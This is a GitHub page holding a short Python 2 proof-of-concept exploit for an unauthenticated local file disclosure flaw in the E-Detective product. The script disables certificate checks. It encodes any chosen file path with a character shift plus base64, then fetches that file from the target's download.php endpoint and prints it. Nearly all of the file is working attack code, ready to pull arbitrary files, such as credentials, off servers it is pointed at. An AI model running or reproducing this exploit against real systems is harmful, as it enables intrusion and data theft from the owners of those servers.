Permalink
Find file
Fetching contributors…
Cannot retrieve contributors at this time
59 lines (44 sloc) 1.62 KB
# Proof-of-concept for unauthenticated LFD in E-Detective.
# Authors: Mustafa Al-Bassam (https://musalbas.com)
# slipstream/RoL (https://twitter.com/TheWack0lian)
import argparse
import base64
import urllib2
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def display_banner():
print """
_
| |
_ ____ ___ __ ___ __| |______
| '_ \ \ /\ / / '_ \ / _ \/ _` |______|
| |_) \ V V /| | | | __/ (_| |
| .__/ \_/\_/ |_| |_|\___|\__,_|
| |
|_|
_ _ _ _
| | | | | | (_)
__| | ___| |_ ___ ___| |_ ___ _____
/ _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\
| (_| | __/ || __/ (__| |_| |\ V / __/
\__,_|\___|\__\___|\___|\__|_| \_/ \___|
"""
argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.')
argparser.add_argument('hostname', help='hostname to pwn')
argparser.add_argument('file', help='path to file on server to grab')
def encode(text):
encoded = ''
for i in range(len(text)):
encoded += chr(ord(text[i]) + 40)
encoded = base64.b64encode(encoded)
return encoded
def poc(hostname, file):
return http_read('https://' + hostname + '/common/download.php?file=' + encode(file))
def http_read(url):
return urllib2.urlopen(url, context=ctx).read()
if __name__ == "__main__":
display_banner()
args = argparser.parse_args()
print poc(args.hostname, args.file)